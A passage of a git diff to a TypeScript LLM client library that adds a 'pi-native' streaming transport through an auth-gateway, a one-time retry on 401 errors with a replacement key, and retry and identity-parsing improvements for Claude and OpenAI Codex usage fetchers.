continue; + wire[k] = v; + } + return wire; +} + +async function decodeGatewayError(response: Response): Promise<Error> { + const status = response.status; + let body: unknown; + try { + body = await response.json(); + } catch { + body = await response.text().catch(() => ""); + } + if (typeof body === "object" && body !== null && "error" in body) { + const err = (body as { error: unknown }).error; + if (typeof err === "object" && err !== null) { + const message = (err as { message?: unknown }).message; + const type = (err as { type?: unknown }).type; + const out = new Error(typeof message === "string" ? message : `auth-gateway ${status}`); + (out as { status?: number; type?: string }).status = status; + if (typeof type === "string") (out as { type?: string }).type = type; + return out; + } + } + const text = typeof body === "string" ? body : JSON.stringify(body); + const err = new Error(`auth-gateway ${status}: ${text || response.statusText}`); + (err as { status?: number }).status = status; + return err; +} + +/** + * Resolve the `/v1/pi/stream` endpoint URL from the model's `baseUrl`. + * Trims a trailing slash so concatenation can't double-slash; throws when + * the baseUrl is missing (transport=pi-native without a gateway target is + * a configuration error, not a runtime recoverable one). + */ +function resolveStreamUrl(model: Model<Api>): string { + if (!model.baseUrl) { + throw new Error( + `pi-native transport requires \`baseUrl\` on model ${model.id} (set it on the provider config in models.yml)`, + ); + } + return `${model.baseUrl.replace(/\/+$/, "")}/v1/pi/stream`; +} + +function buildHeaders(model: Model<Api>, apiKey: string | undefined): Record<string, string> { + const headers: Record<string, string> = { + "Content-Type": "application/json", + Accept: "text/event-stream", + ...(model.headers ?? {}), + }; + if (apiKey && !headers.Authorization) { + headers.Authorization = `Bearer ${apiKey}`; + } + return headers; +} + +/** + * Stream a turn through an `omp auth-gateway` over the pi-native protocol. + * + * The returned {@link AssistantMessageEventStream} receives each parsed + * `AssistantMessageEvent` verbatim from the gateway; the terminal `done` / + * `error` event resolves `.result()` automatically via the base class's + * completion check. Non-streaming consumers just call `.result()` and pay + * for SSE framing they don't use — that overhead is dominated by provider + * latency, so we always stream rather than maintaining a parallel + * non-streaming path. + */ +export function streamPiNative<TApi extends Api>( + model: Model<TApi>, + context: Context, + options?: SimpleStreamOptions, +): AssistantMessageEventStreamType { + const stream = new AssistantMessageEventStream(); + + void (async () => { + const signal = options?.signal; + // Abort propagation: cancel the response body when the caller's signal + // fires. Mirror `streamProxy`'s shape — explicit listener + finally + // cleanup — so we don't leak listeners on the long-running case. + let response: Response | null = null; + const onAbort = (): void => { + const body = response?.body; + if (body) body.cancel("Request aborted by caller").catch(() => {}); + }; + if (signal) { + if (signal.aborted) { + stream.fail(signal.reason instanceof Error ? signal.reason : new Error(String(signal.reason ?? "aborted"))); + return; + } + signal.addEventListener("abort", onAbort, { once: true }); + } + + try { + const url = resolveStreamUrl(model as Model<Api>); + const fetchImpl = options?.fetch ?? globalThis.fetch; + const headers = buildHeaders(model as Model<Api>, options?.apiKey); + const body = JSON.stringify({ + modelId: model.id, + context, + options: buildWireOptions(options), + stream: true, + }); + + response = await fetchImpl(url, { method: "POST", headers, body, signal }); + if (!response.ok) { + stream.fail(await decodeGatewayError(response)); + return; + } + if (!response.body) { + stream.fail(new Error("auth-gateway returned empty body")); + return; + } + + let sawTerminal = false; + for await (const event of readSseJson<AssistantMessageEvent>( + response.body as ReadableStream<Uint8Array>, + signal, + )) { + if (event.type === "done" || event.type === "error") sawTerminal = true; + stream.push(event); + // `stream.push` resolves `.result()` on `done`/`error`; subsequent + // pushes are silently dropped by the base class. We still iterate + // to drain any trailing bytes from the wire so the underlying TCP + // stream closes cleanly. + } + + if (!sawTerminal) { + // SSE closed before a terminal event reached us — synthesize one + // so awaiters of `.result()` resolve instead of hanging forever. + // Matches the gateway's own defensive fallback in + // `pi-native-server.encodeStream`. + const aborted = signal?.aborted === true; + const partial = makeSyntheticAssistant(model as Model<Api>); + if (aborted) { + partial.stopReason = "aborted"; + partial.errorMessage = "stream closed without terminal event"; + stream.push({ type: "error", reason: "aborted", error: partial }); + } else { + partial.stopReason = "stop"; + stream.push({ type: "done", reason: "stop", message: partial }); + } + } + stream.end(); + } catch (err) { + stream.fail(err); + } finally { + if (signal) signal.removeEventListener("abort", onAbort); + } + })(); + + return stream; +} + +function makeSyntheticAssistant(model: Model<Api>): AssistantMessage { + return { + role: "assistant", + content: [], + api: model.api, + provider: model.provider, + model: model.id, + usage: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, + }, + stopReason: "stop", + timestamp: Date.now(), + }; +} diff --git a/packages/ai/src/providers/pi-native-server.ts b/packages/ai/src/providers/pi-native-server.ts new file mode 100644 index 000000000..2be0e9f7e --- /dev/null +++ b/packages/ai/src/providers/pi-native-server.ts @@ -0,0 +1,210 @@ +/** + * Pi-native wire format for the auth-gateway. + * + * Where the OpenAI / Anthropic / Responses route modules translate foreign + * wire shapes through pi-ai's canonical {@link Context}, this module accepts + * the canonical shape *directly* — for clients that already speak pi-ai + * (containerized omp, the swarm extension, robomp's sidecar auth-gateway). + * Skipping the wire-format → Context → wire-format round-trip cuts + * per-request CPU but, more importantly, avoids the quantization that those + * translations impose on first-class pi-ai fields (service tier, cache + * markers, thinking budgets, tool-choice variants, …). + * + * The streaming wire is {@link AssistantMessageEvent} serialized verbatim and + * SSE-framed. Same type pi-ai already produces internally; the client feeds + * each parsed event straight into `AssistantMessageEventStream.push()` with + * no translation. Including `partial: AssistantMessage` on every delta is + * O(N²) in turn length on the wire — acceptable for the loopback / sidecar + * topology this transport is designed for; provider latency dominates the + * actual cost. + * + * Endpoint contract: + * POST /v1/pi/stream + * body: { modelId, context, options?, stream? } // `stream` defaults to true + * 200 SSE: stream of `AssistantMessageEvent` (terminated by `data: [DONE]`) + * 200 JSON (stream=false): { message: AssistantMessage } + * 4xx/5xx: { error: { type, message } } + */ +import type { AssistantMessageEventStream, Context, SimpleStreamOptions } from "../types"; + +export interface PiNativeParsedRequest { + modelId: string; + context: Context; + options: SimpleStreamOptions; + stream: boolean; +} +/** + * Subset of {@link SimpleStreamOptions} accepted from the wire. Function-valued + * fields (`fetch`, `onPayload`, `onResponse`, `onSseEvent`, exec handlers, the + * provider-session map) and gateway-owned controls (`apiKey`, `signal`) are + * intentionally absent — those are server-side concerns. Anything outside this + * allow-list is dropped silently rather than 400ing, so clients can forward + * `SimpleStreamOptions` from older / newer omp builds without per-version + * conditionals. + */ +const ALLOWED_OPTION_KEYS: ReadonlySet<keyof SimpleStreamOptions> = new Set([ + "temperature", + "topP", + "topK", + "minP", + "presencePenalty", + "frequencyPenalty", + "repetitionPenalty", + "stopSequences", + "maxTokens", + "cacheRetention", + "headers", + "initiatorOverride", + "maxRetryDelayMs", + "metadata", + "sessionId", + "streamFirstEventTimeoutMs", + "streamIdleTimeoutMs", + "reasoning", + "disableReasoning", + "hideThinkingSummary", + "thinkingBudgets", + "toolChoice", + "serviceTier", + "kimiApiFormat", + "syntheticApiFormat", + "preferWebsockets", +] as const satisfies readonly (keyof SimpleStreamOptions)[]); + +// --------------------------------------------------------------------------- +// parseRequest +// --------------------------------------------------------------------------- + +/** + * Parse a pi-native request body. Validation is intentionally minimal — only + * the shape the gateway itself reads is checked (`modelId`, `context.messages` + * array, options is an object). Everything downstream is the canonical pi-ai + * type surface; mis-shaped values surface as a `502 upstream_error` from + * `streamSimple` rather than being re-validated here. + * + * Accepts both `{ modelId: string }` and `{ model: { id: string } }` so the + * existing `streamProxy` client (which sends the full Model object) can target + * the gateway with only a URL swap. + */ +export function parseRequest(body: unknown, _headers?: Headers): PiNativeParsedRequest { + if (typeof body !== "object" || body === null || Array.isArray(body)) { + throw new Error("Request body must be a JSON object"); + } + const obj = body as Record<string, unknown>; + + let modelId: string | undefined; + if (typeof obj.modelId === "string" && obj.modelId.length > 0) { + modelId = obj.modelId; + } else if (typeof obj.model === "string" && obj.model.length > 0) { + modelId = obj.model; + } else if (typeof obj.model === "object" && obj.model !== null) { + const m = obj.model as Record<string, unknown>; + if (typeof m.id === "string" && m.id.length > 0) modelId = m.id; + } + if (!modelId) throw new Error("Missing `modelId` (or `model.id`) field"); + + const context = obj.context; + if (typeof context !== "object" || context === null || Array.isArray(context)) { + throw new Error("Missing `context` object"); + } + const ctxObj = context as Record<string, unknown>; + if (!Array.isArray(ctxObj.messages)) { + throw new Error("`context.messages` must be an array"); + } + if (ctxObj.systemPrompt !== undefined && !Array.isArray(ctxObj.systemPrompt)) { + throw new Error("`context.systemPrompt` must be an array of strings when present"); + } + if (ctxObj.tools !== undefined && !Array.isArray(ctxObj.tools)) { + throw new Error("`context.tools` must be an array when present"); + } + + const options: SimpleStreamOptions = {}; + const rawOpts = obj.options; + if (typeof rawOpts === "object" && rawOpts !== null && !Array.isArray(rawOpts)) { + const optsBag = options as Record<string, unknown>; + for (const [k, v] of Object.entries(rawOpts)) { + if (v === undefined || v === null) continue; + if (!ALLOWED_OPTION_KEYS.has(k as keyof SimpleStreamOptions)) continue; + optsBag[k] = v; + } + } + + // `stream` defaults to true — pi-native clients overwhelmingly stream, and + // matching `streamProxy`'s implicit-stream behavior avoids a one-flag papercut. + const stream = typeof obj.stream === "boolean" ? obj.stream : true; + + return { + modelId, + context: context as Context, + options, + stream, + }; +} +// --------------------------------------------------------------------------- +// encodeStream (SSE) +// --------------------------------------------------------------------------- + +const SSE_ENCODER = new TextEncoder(); +const SSE_DONE = SSE_ENCODER.encode("data: [DONE]\n\n"); + +/** + * Ship every {@link AssistantMessageEvent} verbatim, SSE-framed. + * + * No per-event re-shaping: the pi-native client is pi-ai itself, so the + * canonical event type IS the wire type. Including the rolling + * `partial: AssistantMessage` on every delta is quadratic in turn length + * on the wire, but for the loopback / sidecar topology this transport + * targets (containerized omp → host gateway, robomp slot → omp-auth-gateway + * sidecar) the bandwidth cost is negligible compared to provider latency — + * and the client gets to feed the events straight into its existing + * `AssistantMessageEventStream.push()` plumbing with zero translation. + */ +export function encodeStream(events: AssistantMessageEventStream): ReadableStream<Uint8Array> { + return new ReadableStream<Uint8Array>({ + async start(controller) { + try { + for await (const event of events) { + controller.enqueue(SSE_ENCODER.encode(`data: ${JSON.stringify(event)}\n\n`)); + if (event.type === "done" || event.type === "error") break; + } + controller.enqueue(SSE_DONE); + controller.close(); + } catch (err) { + // Best-effort error envelope so the client iterator resolves + // instead of hanging on the dropped connection. Shape matches the + // canonical `error` event minus the unrecoverable `error: + // AssistantMessage` payload (we don't have a usable one here). + const message = err instanceof Error ? err.message : String(err); + controller.enqueue( + SSE_ENCODER.encode( + `data: ${JSON.stringify({ type: "error", reason: "error", errorMessage: message })}\n\n`, + ), + ); + controller.enqueue(SSE_DONE); + controller.close(); + } + }, + }); +} + +// --------------------------------------------------------------------------- +// formatError +// --------------------------------------------------------------------------- + +/** + * Pi-native error envelope: + * `{ error: { type, message } }` + * + * Mirrors OpenAI's outer shape (which clients/SDKs already parse) without the + * provider-specific status taxonomy — pi-native callers consume `type` + * directly. + */ +export function formatError(status: number, type: string, message: string): Response { + return new Response(JSON.stringify({ error: { type, message } }), { + status, + headers: { + "Content-Type": "application/json; charset=utf-8", + "Cache-Control": "no-store", + }, + }); +} diff --git a/packages/ai/src/stream.ts b/packages/ai/src/stream.ts index b2f0d80e2..2295bbc05 100644 --- a/packages/ai/src/stream.ts +++ b/packages/ai/src/stream.ts @@ -1,7 +1,7 @@ import * as fs from "node:fs"; import * as os from "node:os"; import * as path from "node:path"; -import { $env, $pickenv } from "@oh-my-pi/pi-utils"; +import { $env, $pickenv, extractHttpStatusFromError } from "@oh-my-pi/pi-utils"; import { getCustomApi } from "./api-registry"; import type { Effort } from "./model-thinking"; import { @@ -19,6 +19,7 @@ import type { GoogleVertexOptions } from "./providers/google-vertex"; import { isKimiModel, streamKimi } from "./providers/kimi"; import type { OllamaChatOptions } from "./providers/ollama"; import type { OpenAICompletionsOptions } from "./providers/openai-completions"; +import { streamPiNative } from "./providers/pi-native-client"; // Heavy provider stream functions are imported lazily via register-builtins, // which wraps each provider module in a dynamic import. This keeps the // AWS SDK, google-auth-library, @google/genai, @bufbuild/protobuf, and @@ -44,7 +45,6 @@ import { isSyntheticModel, streamSynthetic } from "./providers/synthetic"; import type { Api, AssistantMessage, - AssistantMessageEventStream, Context, Model, OptionsForApi, @@ -53,6 +53,7 @@ import type { ThinkingBudgets, ToolChoice, } from "./types"; +import { AssistantMessageEventStream } from "./utils/event-stream"; import { isFoundryEnabled } from "./utils/foundry"; let cachedVertexAdcCredentialsExists: boolean | null = null; @@ -176,6 +177,15 @@ export function getEnvApiKey(provider: string): string | undefined { return resolver?.(); } +/** + * Enumerate every provider that has an env-var fallback for `getEnvApiKey`. + * Used by `omp auth-broker migrate --include-env` to discover env-sourced keys + * that should be uploaded to the broker. + */ +export function listProvidersWithEnvKey(): string[] { + return Object.keys(serviceProviderMap); +} + export function stream<TApi extends Api>( model: Model<TApi>, context: Context, @@ -269,7 +279,61 @@ export function streamSimple<TApi extends Api>( context: Context, options?: SimpleStreamOptions, ): AssistantMessageEventStream { - // Check custom API registry first (extension-provided APIs) + const retryApiKey = options?.onAuthError ? (options.apiKey ?? getEnvApiKey(model.provider)) : undefined; + if (retryApiKey) { + const outer = new AssistantMessageEventStream(); + const onAuthError = options!.onAuthError!; + let emitted = false; + void (async () => { + try { + const inner = streamSimple(model, context, { ...options, apiKey: retryApiKey, onAuthError: undefined }); + for await (const event of inner) { + emitted = true; + outer.push(event); + if (outer.done) return; + } + if (!outer.done) outer.end(await inner.result()); + } catch (error) { + if (emitted || extractHttpStatusFromError(error) !== 401) { + outer.fail(error); + return; + } + let nextKey: string | undefined; + try { + nextKey = await onAuthError(model.provider, retryApiKey, error); + } catch { + nextKey = undefined; + } + if (!nextKey || nextKey === retryApiKey) { + outer.fail(error); + return; + } + try { + const retried = streamSimple(model, context, { ...options, apiKey: nextKey, onAuthError: undefined }); + for await (const event of retried) { + outer.push(event); + if (outer.done) return; + } + if (!outer.done) outer.end(await retried.result()); + } catch (retryError) { + outer.fail(retryError); + } + } + })(); + return outer; + } + + // Pi-native transport short-circuits the per-provider dispatch entirely: + // the gateway resolves provider + credential server-side, so we don't + // need an `apiKey` from `getEnvApiKey` here — `options.apiKey` carries + // the gateway bearer instead. Comes BEFORE the custom-API check so + // extension-registered APIs can't accidentally override a configured + // pi-native transport. + if (model.transport === "pi-native") { + return streamPiNative(model, context, options); + } + + // Check custom API registry (extension-provided APIs) const customApiProvider = getCustomApi(model.api); if (customApiProvider) { return customApiProvider.streamSimple(model, context, options); diff --git a/packages/ai/src/types.ts b/packages/ai/src/types.ts index e94f0493e..4d8e82e1e 100644 --- a/packages/ai/src/types.ts +++ b/packages/ai/src/types.ts @@ -220,9 +220,26 @@ export interface StreamOptions { minP?: number; presencePenalty?: number; repetitionPenalty?: number; + /** + * Stop sequences. Anthropic encodes as `stop_sequences` (array, max 4); + * OpenAI chat-completions encodes as `stop` (string or array of up to 4); + * OpenAI Responses API has no `stop` field today (silently dropped by the + * provider when present). + */ + stopSequences?: string[]; + /** + * Frequency penalty (OpenAI). Penalizes new tokens based on existing frequency + * in the text so far. Range -2.0 to 2.0. Parallel to {@link presencePenalty}. + */ + frequencyPenalty?: number; maxTokens?: number; signal?: AbortSignal; apiKey?: string; + /** + * Called when a provider returns 401 before any assistant event has been + * emitted. Returning a different key retries the provider request once. + */ + onAuthError?: (provider: string, apiKey: string, error: unknown) => Promise<string | undefined>; cacheRetention?: CacheRetention; /** * Additional headers to include in provider requests. @@ -284,6 +301,10 @@ export interface StreamOptions { * Set to 0 to disable the inter-event idle watchdog for this request. */ streamIdleTimeoutMs?: number; + /** + * Optional retry delay hook for tests and transports that need custom scheduling. + */ + providerRetryWait?: (delayMs: number, signal?: AbortSignal) => Promise<void>; /** * Optional `fetch` implementation override. Providers route every HTTP * request — direct calls, SDK clients, and retry helpers — through this @@ -755,6 +776,21 @@ export interface Model<TApi extends Api = any> { contextWindow: number; maxTokens: number; headers?: Record<string, string>; + /** + * Streaming transport override. When `"pi-native"`, `streamSimple` routes + * the request to the model's `baseUrl` via the auth-gateway's + * `POST /v1/pi/stream` endpoint instead of dispatching the per-API + * provider client. The `baseUrl` must point at an `omp auth-gateway` + * (or compatible) host; `headers.Authorization` (or `apiKey` resolved by + * the registry) carries the gateway bearer. + * + * Used by containerized omp installs (e.g. robomp slots) to route every + * LLM call through a sidecar gateway that holds the real provider + * credentials. The model's other metadata (pricing, context window, + * thinking config, …) still resolves locally; only the streaming + * dispatch is redirected. + */ + transport?: "pi-native"; /** Hint that websocket transport should be preferred when supported by the provider implementation. */ preferWebsockets?: boolean; /** Preferred model to switch to when context promotion is triggered (model id or provider/id). */ diff --git a/packages/ai/src/usage.ts b/packages/ai/src/usage.ts index 376e172e6..2aa4531e1 100644 --- a/packages/ai/src/usage.ts +++ b/packages/ai/src/usage.ts @@ -4,8 +4,8 @@ * Provides a normalized schema to represent multiple limit windows, model tiers, * and shared quotas across providers. */ +import * as z from "zod/v4"; import type { Provider } from "./types"; - export type UsageUnit = "percent" | "tokens" | "requests" | "usd" | "minutes" | "bytes" | "unknown"; export type UsageStatus = "ok" | "warning" | "exhausted" | "unknown"; @@ -72,6 +72,58 @@ export interface UsageReport { raw?: unknown; } +// ─── Zod schemas (wire-shape validation for the broker `/v1/usage` endpoint) ─ + +export const usageUnitSchema = z.enum(["percent", "tokens", "requests", "usd", "minutes", "bytes", "unknown"]); +export const usageStatusSchema = z.enum(["ok", "warning", "exhausted", "unknown"]); + +export const usageWindowSchema = z.object({ + id: z.string(), + label: z.string(), + durationMs: z.number().optional(), + resetsAt: z.number().optional(), +}); + +export const usageAmountSchema = z.object({ + used: z.number().optional(), + limit: z.number().optional(), + remaining: z.number().optional(), + usedFraction: z.number().optional(), + remainingFraction: z.number().optional(), + unit: usageUnitSchema, +}); + +export const usageScopeSchema = z.object({ + provider: z.string(), + accountId: z.string().optional(), + projectId: z.string().optional(), + orgId: z.string().optional(), + modelId: z.string().optional(), + tier: z.string().optional(), + windowId: z.string().optional(), + shared: z.boolean().optional(), +}); + +export const usageLimitSchema = z.object({ + id: z.string(), + label: z.string(), + scope: usageScopeSchema, + window: usageWindowSchema.optional(), + amount: usageAmountSchema, + status: usageStatusSchema.optional(), + notes: z.array(z.string()).optional(), +}); + +export const usageReportSchema = z.object({ + provider: z.string(), + fetchedAt: z.number(), + limits: z.array(usageLimitSchema), + metadata: z.record(z.string(), z.unknown()).optional(), + // `raw` is provider-specific and may be anything; the broker strips it before + // sending the report over the wire, so accept-but-ignore here. + raw: z.unknown().optional(), +}); + /** Optional logger for usage fetchers. */ export interface UsageLogger { debug(message: string, meta?: Record<string, unknown>): void; @@ -104,6 +156,7 @@ export interface UsageFetchParams { export interface UsageFetchContext { fetch: typeof fetch; logger?: UsageLogger; + retryWait?: (delayMs: number, signal?: AbortSignal) => Promise<void>; } /** Provider implementation for fetching usage information. */ diff --git a/packages/ai/src/usage/claude.ts b/packages/ai/src/usage/claude.ts index c4d0fe5e8..8ae269d6b 100644 --- a/packages/ai/src/usage/claude.ts +++ b/packages/ai/src/usage/claude.ts @@ -1,3 +1,4 @@ +import { scheduler } from "node:timers/promises"; import type { CredentialRankingStrategy, UsageAmount, @@ -14,7 +15,7 @@ import { isRecord, toNumber } from "../utils"; const DEFAULT_ENDPOINT = "https://api.anthropic.com/api/oauth"; const FIVE_HOURS_MS = 5 * 60 * 60 * 1000; const SEVEN_DAYS_MS = 7 * 24 * 60 * 60 * 1000; -const MAX_RETRIES = 3; +const MAX_ATTEMPTS = 3; const BASE_RETRY_DELAY_MS = 500; const CLAUDE_HEADERS = { @@ -90,6 +91,11 @@ function getPayloadString(payload: Record<string, unknown>, key: string): string return typeof value === "string" && value.trim() ? value.trim() : undefined; } +function getNestedPayloadString(payload: Record<string, unknown>, key: string, nestedKey: string): string | undefined { + const nested = payload[key]; + return isRecord(nested) ? getPayloadString(nested, nestedKey) : undefined; +} + function extractUsageIdentity(payload: ClaudeUsageResponse, orgId?: string): { accountId?: string; email?: string } { if (!isRecord(payload)) return { accountId: orgId }; const accountId = @@ -99,16 +105,70 @@ function extractUsageIdentity(payload: ClaudeUsageResponse, orgId?: string): { a getPayloadString(payload, "userId") ?? getPayloadString(payload, "org_id") ?? getPayloadString(payload, "orgId") ?? + getNestedPayloadString(payload, "account", "uuid") ?? + getNestedPayloadString(payload, "account", "id") ?? + getNestedPayloadString(payload, "organization", "uuid") ?? + getNestedPayloadString(payload, "organization", "id") ?? + getNestedPayloadString(payload, "user", "uuid") ?? + getNestedPayloadString(payload, "user", "id") ?? orgId; const email = getPayloadString(payload, "email") ?? getPayloadString(payload, "user_email") ?? - getPayloadString(payload, "userEmail"); + getPayloadString(payload, "userEmail") ?? + getNestedPayloadString(payload, "account", "email") ?? + getNestedPayloadString(payload, "user", "email"); return { accountId, email }; } function hasUsageData(payload: ClaudeUsageResponse): boolean { - return Boolean(payload.five_hour || payload.seven_day || payload.seven_day_opus || payload.seven_day_sonnet); + return ( + parseBucket(payload.five_hour)?.utilization !== undefined || + parseBucket(payload.seven_day)?.utilization !== undefined || + parseBucket(payload.seven_day_opus)?.utilization !== undefined || + parseBucket(payload.seven_day_sonnet)?.utilization !== undefined + ); +} + +function isRetryableStatus(status: number): boolean { + return status === 429 || (status >= 500 && status < 600); +} + +function isAbortError(error: unknown, signal?: AbortSignal): boolean { + if (signal?.aborted) return true; + if (!isRecord(error)) return false; + return error.name === "AbortError" || error.name === "TimeoutError"; +} + +function retryDelayMs(attempt: number, retryAfter: string | null): number { + const baseline = BASE_RETRY_DELAY_MS * 2 ** attempt; + if (!retryAfter?.trim()) return baseline; + const seconds = Number.parseFloat(retryAfter); + if (Number.isFinite(seconds)) return Math.max(baseline, Math.max(0, seconds * 1000)); + const dateDelay = Date.parse(retryAfter) - Date.now(); + return Number.isFinite(dateDelay) ? Math.max(baseline, Math.max(0, dateDelay)) : baseline; +} + +async function waitBeforeRetry( + attempt: number, + retryAfter: string | null, + signal?: AbortSignal, + retryWait?: UsageFetchContext["retryWait"], +): Promise<boolean> { + if (signal?.aborted) return false; + if (attempt >= MAX_ATTEMPTS - 1) return false; + try { + const delayMs = retryDelayMs(attempt, retryAfter); + if (retryWait) { + await retryWait(delayMs, signal); + } else { + await scheduler.wait(delayMs, { signal }); + } + return !signal?.aborted; + } catch (error) { + if (isAbortError(error, signal)) return false; + throw error; + } } async function fetchUsagePayload( @@ -117,29 +177,50 @@ async function fetchUsagePayload( ctx: UsageFetchContext, signal?: AbortSignal, ): Promise<ClaudeUsagePayload | null> { + if (signal?.aborted) return null; + let lastPayload: ClaudeUsageResponse | null = null; let lastOrgId: string | undefined; - for (let attempt = 0; attempt < MAX_RETRIES; attempt++) { + for (let attempt = 0; attempt < MAX_ATTEMPTS; attempt++) { try { const response = await ctx.fetch(url, { headers, signal }); - if (!response.ok) { - ctx.logger?.warn("Claude usage fetch failed", { status: response.status, statusText: response.statusText }); - return null; - } - const payload = (await response.json()) as ClaudeUsageResponse; - lastPayload = payload; const orgId = response.headers.get("anthropic-organization-id")?.trim() || undefined; lastOrgId = orgId ?? lastOrgId; - if (payload && isRecord(payload) && hasUsageData(payload)) { - return { payload, orgId }; - } - } catch (error) { - ctx.logger?.warn("Claude usage fetch error", { error: String(error) }); - return null; - } - if (attempt < MAX_RETRIES - 1) { - await Bun.sleep(BASE_RETRY_DELAY_MS * 2 ** attempt); + if (!response.ok) { + const retryable = isRetryableStatus(response.status); + ctx.logger?.warn("Claude usage fetch failed", { + status: response.status, + statusText: response.statusText, + attempt, + willRetry: retryable && attempt < MAX_ATTEMPTS - 1, + }); + if (!retryable) return null; + const retryAfter = response.headers.get("retry-after"); + if (!(await waitBeforeRetry(attempt, retryAfter, signal, ctx.retryWait))) break; + continue; + } + + const parsed = (await response.json()) as unknown; + if (isRecord(parsed)) { + const payload = parsed as ClaudeUsageResponse; + lastPayload = payload; + if (hasUsageData(payload)) return { payload, orgId }; + } + + ctx.logger?.warn("Claude usage response missing usage data", { + attempt, + willRetry: attempt < MAX_ATTEMPTS - 1, + }); + if (!(await waitBeforeRetry(attempt, null, signal, ctx.retryWait))) break; + } catch (error) { + if (isAbortError(error, signal)) return null; + ctx.logger?.warn("Claude usage fetch error", { + error: String(error), + attempt, + willRetry: attempt < MAX_ATTEMPTS - 1, + }); + if (!(await waitBeforeRetry(attempt, null, signal, ctx.retryWait))) break; } } @@ -147,40 +228,47 @@ async function fetchUsagePayload( } interface ClaudeProfile { + uuid?: string; + email?: string; account?: { uuid?: string; email?: string; }; } +function extractProfileIdentity(profile: ClaudeProfile | null): { accountId?: string; email?: string } { + if (!profile || !isRecord(profile)) return {}; + const account = isRecord(profile.account) ? profile.account : undefined; + return { + accountId: + (typeof profile.uuid === "string" && profile.uuid.trim() ? profile.uuid.trim() : undefined) ?? + (typeof account?.uuid === "string" && account.uuid.trim() ? account.uuid.trim() : undefined), + email: + (typeof profile.email === "string" && profile.email.trim() ? profile.email.trim() : undefined) ?? + (typeof account?.email === "string" && account.email.trim() ? account.email.trim() : undefined), + }; +} + async function fetchProfile( baseUrl: string, headers: Record<string, string>, ctx: UsageFetchContext, signal?: AbortSignal, ): Promise<ClaudeProfile | null> { + if (signal?.aborted) return null; const url = `${baseUrl}/profile`; try { const response = await ctx.fetch(url, { headers, signal }); if (!response.ok) return null; - return (await response.json()) as ClaudeProfile; - } catch { + const payload = (await response.json()) as unknown; + return isRecord(payload) ? (payload as ClaudeProfile) : null; + } catch (error) { + if (isAbortError(error, signal)) return null; + ctx.logger?.debug("Claude profile fetch error", { error: String(error) }); return null; } } -async function resolveEmail( - params: UsageFetchParams, - ctx: UsageFetchContext, - baseUrl: string, - headers: Record<string, string>, -): Promise<string | undefined> { - if (params.credential.email) return params.credential.email; - - const profile = await fetchProfile(baseUrl, headers, ctx, params.signal); - return profile?.account?.email; -} - function buildUsageAmount(utilization: number | undefined): UsageAmount | undefined { if (utilization === undefined) return undefined; const clamped = Math.min(Math.max(utilization, 0), 100); @@ -303,17 +391,23 @@ async function fetchClaudeUsage(params: UsageFetchParams, ctx: UsageFetchContext if (limits.length === 0) return null; const identity = extractUsageIdentity(payload, orgId); - const accountId = identity.accountId ?? credential.accountId; - const email = identity.email ?? (await resolveEmail(params, ctx, baseUrl, headers)); + let accountId = identity.accountId ?? credential.accountId; + let email = identity.email ?? credential.email; + if ((!accountId || !email) && !params.signal?.aborted) { + const profileIdentity = extractProfileIdentity(await fetchProfile(baseUrl, headers, ctx, params.signal)); + accountId = accountId ?? profileIdentity.accountId; + email = email ?? profileIdentity.email; + } const report: UsageReport = { provider: params.provider, fetchedAt: Date.now(), limits, metadata: { - accountId, - email, endpoint: url, + ...(accountId ? { accountId } : {}), + ...(email ? { email } : {}), + ...(orgId ? { orgId } : {}), }, raw: payload, }; diff --git a/packages/ai/src/usage/openai-codex.ts b/packages/ai/src/usage/openai-codex.ts index a42cdc90e..b4ff37f3b 100644 --- a/packages/ai/src/usage/openai-codex.ts +++ b/packages/ai/src/usage/openai-codex.ts @@ -31,9 +31,16 @@ interface CodexUsageRateLimitPayload { secondary_window?: CodexUsageWindowPayload | null; } +interface CodexUsageAdditionalRateLimitPayload { + limit_name?: string; + metered_feature?: string; + rate_limit?: CodexUsageRateLimitPayload | null; +} + interface CodexUsagePayload { plan_type?: string; rate_limit?: CodexUsageRateLimitPayload | null; + additional_rate_limits?: CodexUsageAdditionalRateLimitPayload[] | null; } interface ParsedUsageWindow { @@ -43,12 +50,22 @@ interface ParsedUsageWindow { resetAt?: number; } +interface ParsedAdditionalUsage { + limitName?: string; + meteredFeature?: string; + allowed?: boolean; + limitReached?: boolean; + primary?: ParsedUsageWindow; + secondary?: ParsedUsageWindow; +} + interface ParsedUsage { planType?: string; allowed?: boolean; limitReached?: boolean; primary?: ParsedUsageWindow; secondary?: ParsedUsageWindow; + additional: ParsedAdditionalUsage[]; raw: CodexUsagePayload; } @@ -124,20 +141,45 @@ function parseUsageWindow(payload: unknown): ParsedUsageWindow | undefined { }; } +function parseAdditionalRateLimit(payload: unknown): ParsedAdditionalUsage | null { + if (!isRecord(payload)) return null; + const limitName = typeof payload.limit_name === "string" ? payload.limit_name : undefined; + const meteredFeature = typeof payload.metered_feature === "string" ? payload.metered_feature : undefined; + const rateLimit = isRecord(payload.rate_limit) ? payload.rate_limit : undefined; + if (!rateLimit) return null; + const primary = parseUsageWindow(rateLimit.primary_window); + const secondary = parseUsageWindow(rateLimit.secondary_window); + const allowed = toBoolean(rateLimit.allowed); + const limitReached = toBoolean(rateLimit.limit_reached); + if (!primary && !secondary && allowed === undefined && limitReached === undefined) return null; + return { limitName, meteredFeature, allowed, limitReached, primary, secondary }; +} + function parseUsagePayload(payload: unknown): ParsedUsage | null { if (!isRecord(payload)) return null; const planType = typeof payload.plan_type === "string" ? payload.plan_type : undefined; const rateLimit = isRecord(payload.rate_limit) ? payload.rate_limit : undefined; - if (!rateLimit) return null; + const additionalRaw = Array.isArray(payload.additional_rate_limits) ? payload.additional_rate_limits : []; + const additional = additionalRaw + .map(parseAdditionalRateLimit) + .filter((value): value is ParsedAdditionalUsage => value !== null); + if (!rateLimit && additional.length === 0) return null; const parsed: ParsedUsage = { planType, - allowed: toBoolean(rateLimit.allowed), - limitReached: toBoolean(rateLimit.limit_reached), - primary: parseUsageWindow(rateLimit.primary_window), - secondary: parseUsageWindow(rateLimit.secondary_window), + allowed: rateLimit ? toBoolean(rateLimit.allowed) : undefined, + limitReached: rateLimit ? toBoolean(rateLimit.limit_reached) : undefined, + primary: rateLimit ? parseUsageWindow(rateLimit.primary_window) : undefined, + secondary: rateLimit ? parseUsageWindow(rateLimit.secondary_window) : undefined, + additional, raw: payload as CodexUsagePayload, }; - if (!parsed.primary && !parsed.secondary && parsed.allowed === undefined && parsed.limitReached === undefined) { + if ( + !parsed.primary 